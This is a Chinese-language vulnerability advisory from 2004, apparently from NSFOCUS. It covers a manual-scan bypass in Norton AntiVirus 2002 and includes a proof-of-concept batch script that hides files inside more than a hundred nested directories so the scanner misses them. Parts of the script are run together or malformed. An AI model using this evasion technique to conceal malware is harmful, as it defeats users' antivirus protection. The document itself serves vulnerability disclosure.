安全研究

安全漏洞
Symantec Norton AntiVirus 2002文件手工扫描绕过漏洞

发布日期:2004-04-19
更新日期:2004-04-26

受影响系统:
Symantec Norton AntiVirus 2002
    - Microsoft Windows XP Professional
    - Microsoft Windows XP Home
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0 SP3
    - Microsoft Windows NT 4.0 SP2
    - Microsoft Windows NT 4.0 SP1
    - Microsoft Windows NT 4.0
    - Microsoft Windows ME
    - Microsoft Windows 98
    - Microsoft Windows 2000 Professional SP2
    - Microsoft Windows 2000 Professional SP1
    - Microsoft Windows 2000 Professional
描述:
BUGTRAQ  ID: 10164

Symantec Norton AntiVirus 2002是一款防病毒程序。

Symantec Norton AntiVirus 2002在扫描特殊文件名嵌套的文件时存在问题,可导致恶意程序不被扫描到。

把文件存放在多层嵌套的目录中,包含在里面的恶意程序可绕过Norton AntiVirus 2002扫描程序的检测。

<*来源:Bipin Gautam (door_hunt3r@blackcodemail.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=108222209330156&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Bipin Gautam (door_hunt3r@blackcodemail.com)提供了如下测试方法:

@echo off
rem Bipin Gautam [hUNT3R]
rem [http://www.geocities.com/visitbipin] * [http://www.01security.com]
echo ?
echo ************************************************
echo -( For a harmless test... you can use,
echo http://www.eicar.org/anti_virus_test_file.htm )-
echo ************************************************
pause
cdc:
cd:hUNT3r
md 1
cd 1
if not errorlevel 1 goto :hUNT3r
cd..
rmdir 1
md X
cls
echo ***************************************************************
echo Now you can inject any file inside the folder 'X' which is inside
echo 120'th sub-directory of 'c:\1' [ i.e c:\1\..\...\.....[120'th dir].....\X\ ]
echo Note: The file you are moving to'c:\1\...\X\' should only contain
echo '1' char. file name, say: '1.exe' or '2.exe' or 'a.exe' etc...
echo not as '123.not' 'qwert.hak'
echo .........
echo So, ARE YOU DONE!?
echo .........
echo After this batch script is terminated, you'll
echo find the file you ^just copied^ inside c:\1\........\Xecho now in c:\3\3\3\3\3\1\1\1\......[130' th dir].....\Xecho mmm... Then have a manual scan of c:\3\ Any file you
echo have put inside the dir. 'X' can't be detected by NORTON Antivirus anymore!!!
echo ***************************************************

pause
cdmd 3\3\3\3\3\3\3\3\3\3cdxcopy /E /I c:\1\*.* c:3\3\3\3\3\3\3\3\3\3exit

建议:
厂商补丁:

Symantec
--------
目前厂商已经发布了升级补丁以修复这个安全问题,建议用户使用Norton的自动升级更正此问题。

http://www.symantec.com/

浏览次数:3627
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障